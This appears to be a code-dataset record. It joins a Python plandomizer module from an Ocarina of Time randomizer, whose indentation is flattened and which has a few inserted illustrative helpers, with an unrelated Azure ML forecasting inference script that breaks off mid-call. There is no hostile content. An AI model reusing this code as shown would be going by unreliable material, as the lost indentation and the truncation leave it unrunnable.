'dungeons': {name: DungeonRecord(record) for (name, record) in src_dict.get('dungeons', {}).items()},
'trials': {name: TrialRecord(record) for (name, record) in src_dict.get('trials', {}).items()},
'item_pool': {name: ItemPoolRecord(record) for (name, record) in src_dict.get('item_pool', {}).items()},
'starting_items': {name: StarterRecord(record) for (name, record) in src_dict.get('starting_items', {}).items()},
'entrances': {name: EntranceRecord(record) for (name, record) in src_dict.get('entrances', {}).items()},
'locations': {name: [LocationRecord(rec) for rec in record] if is_pattern(name) else LocationRecord(record) for (name, record) in src_dict.get('locations', {}).items() if not is_output_only(name)},
'woth_locations': None,
'barren_regions': None,
'gossip_stones': {name: [GossipRecord(rec) for rec in record] if is_pattern(name) else GossipRecord(record) for (name, record) in src_dict.get('gossip_stones', {}).items()},
}
if update_all:
self.__dict__.update(update_dict)
else:
for k in src_dict:
if k in update_dict:
value = update_dict[k]
if self.__dict__.get(k, None) is None:
setattr(self, k, value)
elif isinstance(value, dict):
getattr(self, k).update(value)
elif isinstance(value, list):
getattr(self, k).extend(value)
else:
setattr(self, k, None)
def to_json(self):
return {
'randomized_settings': self.randomized_settings,
'starting_items': SortedDict({name: record.to_json() for (name, record) in self.starting_items.items()}),
'dungeons': {name: record.to_json() for (name, record) in self.dungeons.items()},
'trials': {name: record.to_json() for (name, record) in self.trials.items()},
'item_pool': SortedDict({name: record.to_json() for (name, record) in self.item_pool.items()}),
'entrances': {name: record.to_json() for (name, record) in self.entrances.items()},
'locations': {name: [rec.to_json() for rec in record] if is_pattern(name) else record.to_json() for (name, record) in self.locations.items()},
':woth_locations': None if self.woth_locations is None else {name: record.to_json() for (name, record) in self.woth_locations.items()},
':barren_regions': self.barren_regions,
'gossip_stones': SortedDict({name: [rec.to_json() for rec in record] if is_pattern(name) else record.to_json() for (name, record) in self.gossip_stones.items()}),
}
def __str__(self):
return dump_obj(self.to_json())
# adds the location entry only if there is no record for that location already
def add_location(self, new_location, new_item):
for (location, record) in self.locations.items():
pattern = pattern_matcher(location)
if pattern(new_location):
raise KeyError('Cannot add location that already exists')
self.locations[new_location] = LocationRecord(new_item)
def configure_dungeons(self, world, dungeon_pool):
dist_num_mq = 0
for (name, record) in self.dungeons.items():
if record.mq is not None:
dungeon_pool.remove(name)
if record.mq:
dist_num_mq += 1
world.dungeon_mq[name] = True
return dist_num_mq
def configure_trials(self, trial_pool):
dist_chosen = []
for (name, record) in self.trials.items():
if record.active is not None:
trial_pool.remove(name)
if record.active:
dist_chosen.append(name)
return dist_chosen
def configure_randomized_settings(self, world):
for name, record in self.randomized_settings.items():
setattr(world, name, record)
if name not in world.randomized_list:
world.randomized_list.append(name)
def configure_stating_items_settings(self, world):
if world.start_with_wallet:
self.give_item('Progressive Wallet', 3)
if world.start_with_rupees:
self.give_item('Rupees', 999)
if world.start_with_deku_equipment:
if world.shopsanity == "off":
self.give_item('Deku Shield')
self.give_item('Deku Sticks', 99)
self.give_item('Deku Nuts', 99)
if world.start_with_fast_travel:
self.give_item('Prelude of Light')
self.give_item('Serenade of Water')
self.give_item('Farores Wind')
def pool_remove_item(self, pools, item_name, count, world_id=None, use_base_pool=True):
removed_items = []
base_remove_matcher = pattern_matcher(item_name)
remove_matcher = lambda item: base_remove_matcher(item) and ((item in self.base_pool) ^ (not use_base_pool))
if world_id is None:
predicate = remove_matcher
else:
predicate = lambda item: item.world.id == world_id and remove_matcher(item.name)
for i in range(count):
removed_item = pull_random_element(pools, predicate)
if removed_item is None:
if not use_base_pool:
if IsItem(item_name):
raise KeyError('No remaining items matching "%s" to be removed.' % (item_name))
else:
raise KeyError('No items matching "%s"' % (item_name))
else:
removed_items.extend(self.pool_remove_item(pools, item_name, count - i, world_id=world_id, use_base_pool=False))
break
if use_base_pool:
if world_id is None:
self.base_pool.remove(removed_item)
else:
self.base_pool.remove(removed_item.name)
removed_items.append(removed_item)
return removed_items
def pool_add_item(self, pool, item_name, count):
added_items = []
if item_name == '#Junk':
added_items = get_junk_item(count)
elif is_pattern(item_name):
add_matcher = lambda item: pattern_matcher(item_name)(item.name)
candidates = [item.name for item in ItemIterator(predicate=add_matcher)]
if len(candidates) == 0:
raise RuntimeError("Unknown item could not be added: " + item_name)
added_items = random_choices(candidates, k=count)
else:
if not IsItem(item_name):
raise RuntimeError("Unknown item could not be added: " + item_name)
added_items = [item_name] * count
for item in added_items:
pool.append(item)
return added_items
def alter_pool(self, world, pool):
self.base_pool = list(pool)
pool_size = len(pool)
bottle_matcher = pattern_matcher("#Bottle")
trade_matcher = pattern_matcher("#AdultTrade")
for item_name, record in self.item_pool.items():
if record.type == 'add':
self.pool_add_item(pool, item_name, record.count)
if record.type == 'remove':
self.pool_remove_item([pool], item_name, record.count)
for item_name, record in self.item_pool.items():
if record.type == 'set':
if item_name == '#Junk':
raise ValueError('#Junk item group cannot have a set number of items')
predicate = pattern_matcher(item_name)
pool_match = [item for item in pool if predicate(item)]
for item in pool_match:
self.base_pool.remove(item)
add_count = record.count - len(pool_match)
if add_count > 0:
added_items = self.pool_add_item(pool, item_name, add_count)
for item in added_items:
if bottle_matcher(item):
self.pool_remove_item([pool], "#Bottle", 1)
elif trade_matcher(item):
self.pool_remove_item([pool], "#AdultTrade", 1)
else:
removed_items = self.pool_remove_item([pool], item_name, -add_count)
for item in removed_items:
if bottle_matcher(item):
self.pool_add_item(pool, "#Bottle", 1)
elif trade_matcher(item):
self.pool_add_item(pool, "#AdultTrade", 1)
junk_to_add = pool_size - len(pool)
if junk_to_add > 0:
junk_items = self.pool_add_item(pool, "#Junk", junk_to_add)
else:
junk_items = self.pool_remove_item([pool], "#Junk", -junk_to_add)
return pool
def set_complete_itempool(self, pool):
self.item_pool = {}
for item in pool:
if item.dungeonitem or item.type in ('Drop', 'Event', 'DungeonReward'):
continue
if item.name in self.item_pool:
self.item_pool[item.name].count += 1
else:
self.item_pool[item.name] = ItemPoolRecord()
def collect_starters(self, state):
for (name, record) in self.starting_items.items():
for _ in range(record.count):
try:
item = ItemFactory("Bottle" if name == "Bottle with Milk (Half)" else name)
except KeyError:
continue
state.collect(item)
def set_shuffled_entrances(self, worlds, entrance_pools, target_entrance_pools, locations_to_ensure_reachable, itempool):
for (name, record) in self.entrances.items():
if record.region is None:
continue
if not worlds[self.id].get_entrance(name):
raise RuntimeError('Unknown entrance in world %d: %s' % (self.id + 1, name))
entrance_found = False
for pool_type, entrance_pool in entrance_pools.items():
try:
matched_entrance = next(filter(lambda entrance: entrance.name == name, entrance_pool))
except StopIteration:
continue
entrance_found = True
if matched_entrance.connected_region != None:
if matched_entrance.type == 'Overworld':
continue
else:
raise RuntimeError('Entrance already shuffled in world %d: %s' % (self.id + 1, name))
target_region = record.region
matched_targets_to_region = list(filter(lambda target: target.connected_region and target.connected_region.name == target_region,
target_entrance_pools[pool_type]))
if not matched_targets_to_region:
raise RuntimeError('No entrance found to replace with %s that leads to %s in world %d' %
(matched_entrance, target_region, self.id + 1))
if record.origin:
target_parent = record.origin
try:
matched_target = next(filter(lambda target: target.replaces.parent_region.name == target_parent, matched_targets_to_region))
except StopIteration:
raise RuntimeError('No entrance found to replace with %s that leads to %s from %s in world %d' %
(matched_entrance, target_region, target_parent, self.id + 1))
else:
matched_target = matched_targets_to_region[0]
target_parent = matched_target.parent_region.name
if matched_target.connected_region == None:
raise RuntimeError('Entrance leading to %s from %s is already shuffled in world %d' %
(target_region, target_parent, self.id + 1))
try:
check_entrances_compatibility(matched_entrance, matched_target)
change_connections(matched_entrance, matched_target)
validate_world(matched_entrance.world, worlds, None, locations_to_ensure_reachable, itempool)
except EntranceShuffleError as error:
raise RuntimeError('Cannot connect %s to %s in world %d (Reason: %s)' %
(matched_entrance, matched_entrance.connected_region or matched_target.connected_region, self.id + 1, error))
confirm_replacement(matched_entrance, matched_target)
if not entrance_found:
raise RuntimeError('Entrance does not belong to a pool of shuffled entrances in world %d: %s' % (self.id + 1, name))
def fill_bosses(self, world, prize_locs, prizepool):
count = 0
for (name, record) in pattern_dict_items(self.locations):
boss = pull_item_or_location([prize_locs], world, name)
if boss is None:
try:
location = LocationFactory(name)
except KeyError:
raise RuntimeError('Unknown boss in world %d: %s' % (world.id + 1, name))
if location.type == 'Boss':
raise RuntimeError('Boss location already placed in world %d: %s' % (world.id + 1, name))
else:
continue
if record.player is not None and (record.player - 1) != self.id:
raise RuntimeError('A boss can only give rewards in its own world')
reward = pull_item_or_location([prizepool], world, record.item)
if reward is None:
if IsItem(record.item):
raise RuntimeError('Reward already placed in world %d: %s' % (world.id + 1, record.item))
else:
raise RuntimeError('Reward unknown in world %d: %s' % (world.id + 1, record.item))
count += 1
world.push_item(boss, reward, True)
return count
def fill(self, window, worlds, location_pools, item_pools):
world = worlds[self.id]
for (location_name, record) in pattern_dict_items(self.locations):
if record.item is None:
continue
player_id = self.id if record.player is None else record.player - 1
location_matcher = lambda loc: loc.world.id == world.id and loc.name == location_name
location = pull_first_element(location_pools, location_matcher)
if location is None:
try:
location = LocationFactory(location_name)
except KeyError:
raise RuntimeError('Unknown location in world %d: %s' % (world.id + 1, location_name))
if location.type == 'Boss':
continue
elif location.name in world.disabled_locations:
continue
else:
raise RuntimeError('Location already filled in world %d: %s' % (self.id + 1, location_name))
if record.item == '#Junk' and location.type == 'Song' and not world.shuffle_song_items:
record.item = '#JunkSong'
try:
item = self.pool_remove_item(item_pools, record.item, 1, world_id=player_id)[0]
except KeyError:
try:
self.pool_remove_item(item_pools, "#Junk", 1, world_id=player_id)
item_matcher = lambda item: pattern_matcher(record.item)(item.name)
item = random.choice(list(ItemIterator(item_matcher, worlds[player_id])))
except KeyError:
raise RuntimeError('Too many items were added to world %d, and not enough junk is available to be removed.' % (self.id + 1))
if record.price is not None and item.type != 'Shop':
location.price = record.price
world.shop_prices[location.name] = record.price
if location.type == 'Song' and item.type != 'Song':
self.song_as_items = True
location.world.push_item(location, item, True)
if item.advancement:
playthrough = Playthrough.max_explore([world.state for world in worlds], itertools.chain.from_iterable(item_pools))
if not playthrough.can_beat_game(False):
raise FillError('%s in world %d is not reachable without %s in world %d!' % (location.name, self.id + 1, item.name, player_id + 1))
window.fillcount += 1
window.update_progress(5 + ((window.fillcount / window.locationcount) * 30))
def cloak(self, worlds, location_pools, model_pools):
for (name, record) in pattern_dict_items(self.locations):
if record.model is None:
continue
player_id = self.id if record.player is None else record.player - 1
world = worlds[player_id]
try:
location = LocationFactory(name)
except KeyError:
raise RuntimeError('Unknown location in world %d: %s' % (world.id + 1, name))
if location.type == 'Boss':
continue
location = pull_item_or_location(location_pools, world, name)
if location is None:
raise RuntimeError('Location already cloaked in world %d: %s' % (self.id + 1, name))
model = pull_item_or_location(model_pools, world, record.model, remove=False)
if model is None:
raise RuntimeError('Unknown model in world %d: %s' % (self.id + 1, record.model))
if can_cloak(location.item, model):
location.item.looks_like_item = model
def configure_gossip(self, spoiler, stoneIDs):
for (name, record) in pattern_dict_items(self.gossip_stones):
matcher = pattern_matcher(name)
stoneID = pull_random_element([stoneIDs], lambda id: matcher(gossipLocations[id].name))
if stoneID is None:
raise RuntimeError('Gossip stone unknown or already assigned in world %d: %s' % (self.id + 1, name))
spoiler.hints[self.id][stoneID] = GossipText(text=record.text, colors=record.colors, prefix='')
def give_item(self, item, count=1):
if item in self.starting_items:
self.starting_items[item].count += count
else:
self.starting_items[item] = StarterRecord(count)
def give_items(self, save_context):
for (name, record) in self.starting_items.items():
if record.count == 0:
continue
save_context.give_item(name, record.count)
def get_starting_item(self, item):
if item in self.starting_items:
return self.starting_items[item].count
else:
return 0
class Distribution(object):
def __init__(self, settings, src_dict={}):
self.settings = settings
self.world_dists = [WorldDistribution(self, id) for id in range(settings.world_count)]
self.update(src_dict, update_all=True)
# adds the location entry only if there is no record for that location already
def add_location(self, new_location, new_item):
for world_dist in self.world_dists:
try:
world_dist.add_location(new_location, new_item)
except KeyError:
print('Cannot place item at excluded location because it already has an item defined in the Distribution.')
def fill(self, window, worlds, location_pools, item_pools):
playthrough = Playthrough.max_explore([world.state for world in worlds], itertools.chain.from_iterable(item_pools))
if not playthrough.can_beat_game(False):
raise FillError('Item pool does not contain items required to beat game!')
for world_dist in self.world_dists:
world_dist.fill(window, worlds, location_pools, item_pools)
def cloak(self, worlds, location_pools, model_pools):
for world_dist in self.world_dists:
world_dist.cloak(worlds, location_pools, model_pools)
def configure_triforce_hunt(self, worlds):
total_count = 0
total_starting_count = 0
for world in worlds:
world.triforce_count = world.distribution.item_pool['Triforce Piece'].count
if 'Triforce Piece' in world.distribution.starting_items:
world.triforce_count += world.distribution.starting_items['Triforce Piece'].count
total_starting_count += world.distribution.starting_items['Triforce Piece'].count
total_count += world.triforce_count
if total_count < worlds[0].triforce_goal:
raise RuntimeError('Not enough Triforce Pieces in the worlds. There should be at least %d and there are only %d.' % (worlds[0].triforce_goal, total_count))
if total_starting_count >= worlds[0].triforce_goal:
raise RuntimeError('Too many Triforce Pieces in starting items. There should be at most %d and there are %d.' % (worlds[0].triforce_goal - 1, total_starting_count))
def update(self, src_dict, update_all=False):
update_dict = {
'file_hash': (src_dict.get('file_hash', []) + [None, None, None, None, None])[0:5],
'playthrough': None,
'entrance_playthrough': None,
'_settings': src_dict.get('settings', {}),
}
self.settings.__dict__.update(update_dict['_settings'])
if 'settings' in src_dict:
src_dict['_settings'] = src_dict['settings']
del src_dict['settings']
if update_all:
self.__dict__.update(update_dict)
for world in self.world_dists:
world.update({}, update_all=True)
else:
for k in src_dict:
setattr(self, k, update_dict[k])
for k in per_world_keys:
if k in src_dict:
for world_id, world in enumerate(self.world_dists):
world_key = 'World %d' % (world_id + 1)
if world_key in src_dict[k]:
world.update({k: src_dict[k][world_key]})
del src_dict[k][world_key]
for world in self.world_dists:
if src_dict[k]:
world.update({k: src_dict[k]})
def to_json(self, include_output=True, spoiler=True):
self_dict = {
':version': __version__,
'file_hash': CollapseList(self.file_hash),
':seed': self.settings.seed,
':settings_string': self.settings.settings_string,
'settings': self.settings.to_json(),
}
if spoiler:
world_dist_dicts = [world_dist.to_json() for world_dist in self.world_dists]
if self.settings.world_count > 1:
for k in per_world_keys:
self_dict[k] = {}
for id, world_dist_dict in enumerate(world_dist_dicts):
self_dict[k]['World %d' % (id + 1)] = world_dist_dict[k]
else:
self_dict.update({k: world_dist_dicts[0][k] for k in per_world_keys})
if self.playthrough is not None:
self_dict[':playthrough'] = AllignedDict({
sphere_nr: SortedDict({
name: record.to_json() for name, record in sphere.items()
})
for (sphere_nr, sphere) in self.playthrough.items()
}, depth=2)
if self.entrance_playthrough is not None and len(self.entrance_playthrough) > 0:
self_dict[':entrance_playthrough'] = AllignedDict({
sphere_nr: SortedDict({
name: record.to_json() for name, record in sphere.items()
})
for (sphere_nr, sphere) in self.entrance_playthrough.items()
}, depth=2)
if not include_output:
strip_output_only(self_dict)
self_dict['settings'] = dict(self._settings)
return self_dict
def to_str(self, include_output_only=True, spoiler=True):
return dump_obj(self.to_json(include_output_only, spoiler))
def __str__(self):
return dump_obj(self.to_json())
def update_spoiler(self, spoiler, output_spoiler):
self.file_hash = [HASH_ICONS[icon] for icon in spoiler.file_hash]
if not output_spoiler:
return
spoiler.parse_data()
for world in spoiler.worlds:
world_dist = self.world_dists[world.id]
world_dist.randomized_settings = {randomized_item: getattr(world, randomized_item) for randomized_item in world.randomized_list}
world_dist.dungeons = {dung: DungeonRecord({ 'mq': world.dungeon_mq[dung] }) for dung in world.dungeon_mq}
world_dist.trials = {trial: TrialRecord({ 'active': not world.skipped_trials[trial] }) for trial in world.skipped_trials}
world_dist.entrances = {ent.name: EntranceRecord.from_entrance(ent) for ent in spoiler.entrances[world.id]}
world_dist.locations = {loc: LocationRecord.from_item(item) for (loc, item) in spoiler.locations[world.id].items()}
world_dist.woth_locations = {loc.name: LocationRecord.from_item(loc.item) for loc in spoiler.required_locations[world.id]}
world_dist.barren_regions = [*world.empty_areas]
world_dist.gossip_stones = {gossipLocations[loc].name: GossipRecord(spoiler.hints[world.id][loc].to_json()) for loc in spoiler.hints[world.id]}
self.playthrough = {}
for (sphere_nr, sphere) in spoiler.playthrough.items():
loc_rec_sphere = {}
self.playthrough[sphere_nr] = loc_rec_sphere
for location in sphere:
if spoiler.settings.world_count > 1:
location_key = '%s [W%d]' % (location.name, location.world.id + 1)
else:
location_key = location.name
loc_rec_sphere[location_key] = LocationRecord.from_item(location.item)
self.entrance_playthrough = {}
for (sphere_nr, sphere) in spoiler.entrance_playthrough.items():
if len(sphere) > 0:
ent_rec_sphere = {}
self.entrance_playthrough[sphere_nr] = ent_rec_sphere
for entrance in sphere:
if spoiler.settings.world_count > 1:
entrance_key = '%s [W%d]' % (entrance.name, entrance.world.id + 1)
else:
entrance_key = entrance.name
ent_rec_sphere[entrance_key] = EntranceRecord.from_entrance(entrance)
@staticmethod
def from_file(settings, filename):
if any(map(filename.endswith, ['.z64', '.n64', '.v64'])):
raise InvalidFileException("Your Ocarina of Time ROM doesn't belong in the plandomizer setting. If you don't know what plandomizer is, or don't plan to use it, leave that setting blank and try again.")
try:
with open(filename) as infile:
src_dict = json.load(infile)
except json.decoder.JSONDecodeError as e:
raise InvalidFileException(f"Invalid Plandomizer File. Make sure the file is a valid JSON file. Failure reason: {str(e)}") from None
return Distribution(settings, src_dict)
def to_file(self, filename, output_spoiler):
json = self.to_str(spoiler=output_spoiler)
with open(filename, 'w') as outfile:
outfile.write(json)
def strip_output_only(obj):
if isinstance(obj, list):
for elem in obj:
strip_output_only(elem)
elif isinstance(obj, dict):
output_only_keys = [key for key in obj if is_output_only(key)]
for key in output_only_keys:
del obj[key]
for elem in obj.values():
strip_output_only(elem)
def can_cloak(actual_item, model):
return actual_item.index == 0x7C # Ice Trap
def is_output_only(pattern):
return pattern.startswith(':')
def is_pattern(pattern):
return pattern.startswith('!') or pattern.startswith('*') or pattern.startswith('#') or pattern.endswith('*')
def pattern_matcher(pattern):
if isinstance(pattern, list):
pattern_list = []
# Combine the sub-matchers; the seed callable must accept the item argument.
for pattern_item in pattern:
pattern_list.append(pattern_matcher(pattern_item))
return reduce(lambda acc, sub_matcher: lambda item: sub_matcher(item) or acc(item), pattern_list, lambda _: False)
invert = pattern.startswith('!')
if invert:
pattern = pattern[1:]
if pattern.startswith('#'):
group = search_groups[pattern[1:]]
return lambda s: invert != (s in group)
wildcard_begin = pattern.startswith('*')
if wildcard_begin:
pattern = pattern[1:]
wildcard_end = pattern.endswith('*')
if wildcard_end:
pattern = pattern[:-1]
if wildcard_begin:
return lambda s: invert != (pattern in s)
else:
return lambda s: invert != s.startswith(pattern)
else:
if wildcard_begin:
return lambda s: invert != s.endswith(pattern)
else:
return lambda s: invert != (s == pattern)
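# Illustrative sketch, not part of the original module: a minimal demonstration of the
# wildcard and negation forms accepted by pattern_matcher(). The item names are hypothetical.
def _pattern_matcher_examples():
    ends_with = pattern_matcher('*Sword')        # a leading '*' alone means "ends with"
    assert ends_with('Kokiri Sword')
    assert not ends_with('Deku Shield')
    negated = pattern_matcher('!Bottle*')        # a leading '!' inverts the match
    assert not negated('Bottle with Milk')
    assert negated('Hover Boots')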
def pattern_dict_items(pattern_dict):
for (key, value) in pattern_dict.items():
if is_pattern(key):
pattern = lambda loc: pattern_matcher(key)(loc.name)
for location in LocationIterator(pattern):
yield(location.name, value)
else:
yield (key, value)
def pull_first_element(pools, predicate=lambda k:True, remove=True):
for pool in pools:
for element in pool:
if predicate(element):
if remove:
pool.remove(element)
return element
return None
def pull_random_element(pools, predicate=lambda k:True, remove=True):
candidates = [(element, pool) for pool in pools for element in pool if predicate(element)]
if len(candidates) == 0:
return None
element, pool = random.choice(candidates)
if remove:
pool.remove(element)
return element
def pull_all_elements(pools, predicate=lambda k:True, remove=True):
elements = []
for pool in pools:
for element in pool:
if predicate(element):
if remove:
pool.remove(element)
elements.append(element)
if len(elements) == 0:
return None
return elements
# Finds and removes (unless told not to do so) an item or location matching the criteria from a list of pools.
def pull_item_or_location(pools, world, name, remove=True):
if is_pattern(name):
matcher = pattern_matcher(name)
return pull_random_element(pools, lambda e: e.world is world and matcher(e.name), remove)
else:
return pull_first_element(pools, lambda e: e.world is world and e.name == name, remove)
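# Illustrative sketch, not part of the original module: pull_first_element() removes and
# returns the first element satisfying the predicate; the pool itself is mutated.
def _pull_first_element_example():
    pool = [1, 2, 3, 4]
    value = pull_first_element([pool], lambda n: n % 2 == 0)
    return value, pool  # (2, [1, 3, 4])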
| 40.833693
| 213
| 0.595843
|
6b2fc926268e267e0d7700d1b46266abb44556a0
| 11,712
|
py
|
Python
|
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | 2
|
2019-05-03T20:20:39.000Z
|
2019-05-05T17:54:43.000Z
|
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | null | null | null |
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | 5
|
2019-05-03T20:20:53.000Z
|
2019-05-04T13:01:49.000Z
|
import pandas as pd
import numpy as np
import argparse
from azureml.core import Run
from sklearn.externals import joblib
from sklearn.metrics import mean_absolute_error, mean_squared_error
from azureml.automl.core._vendor.automl.client.core.common import metrics
from automl.client.core.common import constants
from pandas.tseries.frequencies import to_offset
def align_outputs(y_predicted, X_trans, X_test, y_test,
predicted_column_name='predicted',
horizon_colname='horizon_origin'):
"""
Demonstrates how to get the output aligned to the inputs
using pandas indexes. Helps understand what happened if
the output's shape differs from the input shape, or if
the data got re-sorted by time and grain during forecasting.
Typical causes of misalignment are:
* we predicted some periods that were missing in actuals -> drop from eval
* model was asked to predict past max_horizon -> increase max horizon
* data at start of X_test was needed for lags -> provide previous periods
"""
if (horizon_colname in X_trans):
df_fcst = pd.DataFrame({predicted_column_name: y_predicted,
horizon_colname: X_trans[horizon_colname]})
else:
df_fcst = pd.DataFrame({predicted_column_name: y_predicted})
# y and X outputs are aligned by forecast() function contract
df_fcst.index = X_trans.index
# align original X_test to y_test
X_test_full = X_test.copy()
X_test_full[target_column_name] = y_test
# X_test_full's index does not include origin, so reset for merge
df_fcst.reset_index(inplace=True)
X_test_full = X_test_full.reset_index().drop(columns='index')
together = df_fcst.merge(X_test_full, how='right')
# drop rows where prediction or actuals are nan
# happens because of missing actuals
# or at edges of time due to lags/rolling windows
clean = together[together[[target_column_name,
predicted_column_name]].notnull().all(axis=1)]
return(clean)
def do_rolling_forecast_with_lookback(fitted_model, X_test, y_test,
max_horizon, X_lookback, y_lookback,
freq='D'):
"""
Produce forecasts on a rolling origin over the given test set.
Each iteration makes a forecast for the next 'max_horizon' periods
with respect to the current origin, then advances the origin by the
horizon time duration. The prediction context for each forecast is set so
that the forecaster uses the actual target values prior to the current
origin time for constructing lag features.
This function returns a concatenated DataFrame of rolling forecasts.
"""
print("Using lookback of size: ", y_lookback.size)
df_list = []
origin_time = X_test[time_column_name].min()
X = X_lookback.append(X_test)
y = np.concatenate((y_lookback, y_test), axis=0)
while origin_time <= X_test[time_column_name].max():
# Set the horizon time - end date of the forecast
horizon_time = origin_time + max_horizon * to_offset(freq)
# Extract test data from an expanding window up to the horizon
expand_wind = (X[time_column_name] < horizon_time)
X_test_expand = X[expand_wind]
y_query_expand = np.zeros(len(X_test_expand)).astype(np.float)
y_query_expand.fill(np.NaN)
if origin_time != X[time_column_name].min():
# Set the context by including actuals up to the origin time
test_context_expand_wind = (X[time_column_name] < origin_time)
context_expand_wind = (
X_test_expand[time_column_name] < origin_time)
y_query_expand[context_expand_wind] = y[test_context_expand_wind]
# Print some debug info
print("Horizon_time:", horizon_time,
" origin_time: ", origin_time,
" max_horizon: ", max_horizon,
" freq: ", freq)
print("expand_wind: ", expand_wind)
print("y_query_expand")
print(y_query_expand)
print("X_test")
print(X)
print("X_test_expand")
print(X_test_expand)
print("Type of X_test_expand: ", type(X_test_expand))
print("Type of y_query_expand: ", type(y_query_expand))
print("y_query_expand")
print(y_query_expand)
# Make a forecast out to the maximum horizon
# y_fcst, X_trans = y_query_expand, X_test_expand
y_fcst, X_trans = fitted_model.forecast(X_test_expand, y_query_expand)
print("y_fcst")
print(y_fcst)
# Align forecast with test set for dates within
# the current rolling window
trans_tindex = X_trans.index.get_level_values(time_column_name)
trans_roll_wind = (trans_tindex >= origin_time) & (
trans_tindex < horizon_time)
test_roll_wind = expand_wind & (X[time_column_name] >= origin_time)
df_list.append(align_outputs(
y_fcst[trans_roll_wind], X_trans[trans_roll_wind],
X[test_roll_wind], y[test_roll_wind]))
# Advance the origin time
origin_time = horizon_time
return pd.concat(df_list, ignore_index=True)
def do_rolling_forecast(fitted_model, X_test, y_test, max_horizon, freq='D'):
"""
Produce forecasts on a rolling origin over the given test set.
Each iteration makes a forecast for the next 'max_horizon' periods
with respect to the current origin, then advances the origin by the
horizon time duration. The prediction context for each forecast is set so
that the forecaster uses the actual target values prior to the current
origin time for constructing lag features.
This function returns a concatenated DataFrame of rolling forecasts.
"""
df_list = []
origin_time = X_test[time_column_name].min()
while origin_time <= X_test[time_column_name].max():
# Set the horizon time - end date of the forecast
horizon_time = origin_time + max_horizon * to_offset(freq)
# Extract test data from an expanding window up to the horizon
expand_wind = (X_test[time_column_name] < horizon_time)
X_test_expand = X_test[expand_wind]
y_query_expand = np.zeros(len(X_test_expand)).astype(np.float)
y_query_expand.fill(np.NaN)
if origin_time != X_test[time_column_name].min():
# Set the context by including actuals up to the origin time
test_context_expand_wind = (X_test[time_column_name] < origin_time)
context_expand_wind = (
X_test_expand[time_column_name] < origin_time)
y_query_expand[context_expand_wind] = y_test[
test_context_expand_wind]
# Print some debug info
print("Horizon_time:", horizon_time,
" origin_time: ", origin_time,
" max_horizon: ", max_horizon,
" freq: ", freq)
print("expand_wind: ", expand_wind)
print("y_query_expand")
print(y_query_expand)
print("X_test")
print(X_test)
print("X_test_expand")
print(X_test_expand)
print("Type of X_test_expand: ", type(X_test_expand))
print("Type of y_query_expand: ", type(y_query_expand))
print("y_query_expand")
print(y_query_expand)
# Make a forecast out to the maximum horizon
y_fcst, X_trans = fitted_model.forecast(X_test_expand, y_query_expand)
print("y_fcst")
print(y_fcst)
# Align forecast with test set for dates within the
# current rolling window
trans_tindex = X_trans.index.get_level_values(time_column_name)
trans_roll_wind = (trans_tindex >= origin_time) & (
trans_tindex < horizon_time)
test_roll_wind = expand_wind & (
X_test[time_column_name] >= origin_time)
df_list.append(align_outputs(y_fcst[trans_roll_wind],
X_trans[trans_roll_wind],
X_test[test_roll_wind],
y_test[test_roll_wind]))
# Advance the origin time
origin_time = horizon_time
return pd.concat(df_list, ignore_index=True)
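# Illustrative sketch, not part of the original script: shows only the window arithmetic
# used by the rolling-forecast helpers above (the origin advances by the horizon duration
# each iteration). No fitted model is involved; the dates are hypothetical.
def _rolling_window_sketch(max_horizon=3, freq='D'):
    origin = pd.Timestamp('2019-01-01')
    end = pd.Timestamp('2019-01-10')
    windows = []
    while origin <= end:
        horizon = origin + max_horizon * to_offset(freq)
        windows.append((origin, horizon))
        origin = horizon  # advance the origin to the end of the last forecast window
    return windows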
def APE(actual, pred):
"""
Calculate absolute percentage error.
Returns a vector of APE values with same length as actual/pred.
"""
return 100 * np.abs((actual - pred) / actual)
def MAPE(actual, pred):
"""
Calculate mean absolute percentage error.
Remove NaN values and cases where the actual is close to zero
"""
not_na = ~(np.isnan(actual) | np.isnan(pred))
not_zero = ~np.isclose(actual, 0.0)
actual_safe = actual[not_na & not_zero]
pred_safe = pred[not_na & not_zero]
return np.mean(APE(actual_safe, pred_safe))
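# Illustrative sketch, not part of the original script: near-zero actuals are dropped
# before averaging, so the percentage error stays finite. The numbers are hypothetical.
def _mape_example():
    actual = np.array([100.0, 200.0, 0.0])
    pred = np.array([110.0, 180.0, 5.0])
    return MAPE(actual, pred)  # mean of [10.0, 10.0] -> 10.0; the zero actual is excluded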
parser = argparse.ArgumentParser()
parser.add_argument(
'--max_horizon', type=int, dest='max_horizon',
default=10, help='Max Horizon for forecasting')
parser.add_argument(
'--target_column_name', type=str, dest='target_column_name',
help='Target Column Name')
parser.add_argument(
'--time_column_name', type=str, dest='time_column_name',
help='Time Column Name')
parser.add_argument(
'--frequency', type=str, dest='freq',
help='Frequency of prediction')
args = parser.parse_args()
max_horizon = args.max_horizon
target_column_name = args.target_column_name
time_column_name = args.time_column_name
freq = args.freq
print('args passed are: ')
print(max_horizon)
print(target_column_name)
print(time_column_name)
print(freq)
run = Run.get_context()
# get input dataset by name
test_dataset = run.input_datasets['test_data']
lookback_dataset = run.input_datasets['lookback_data']
grain_column_names = []
df = test_dataset.to_pandas_dataframe()
print('Read df')
print(df)
X_test_df = test_dataset.drop_columns(columns=[target_column_name])
y_test_df = test_dataset.with_timestamp_columns(
None).keep_columns(columns=[target_column_name])
X_lookback_df = lookback_dataset.drop_columns(columns=[target_column_name])
y_lookback_df = lookback_dataset.with_timestamp_columns(
None).keep_columns(columns=[target_column_name])
fitted_model = joblib.load('model.pkl')
if hasattr(fitted_model, 'get_lookback'):
lookback = fitted_model.get_lookback()
df_all = do_rolling_forecast_with_lookback(
fitted_model,
X_test_df.to_pandas_dataframe(),
y_test_df.to_pandas_dataframe().values.T[0],
max_horizon,
X_lookback_df.to_pandas_dataframe()[-lookback:],
y_lookback_df.to_pandas_dataframe().values.T[0][-lookback:],
freq)
else:
df_all = do_rolling_forecast(
fitted_model,
X_test_df.to_pandas_dataframe(),
y_test_df.to_pandas_dataframe().values.T[0],
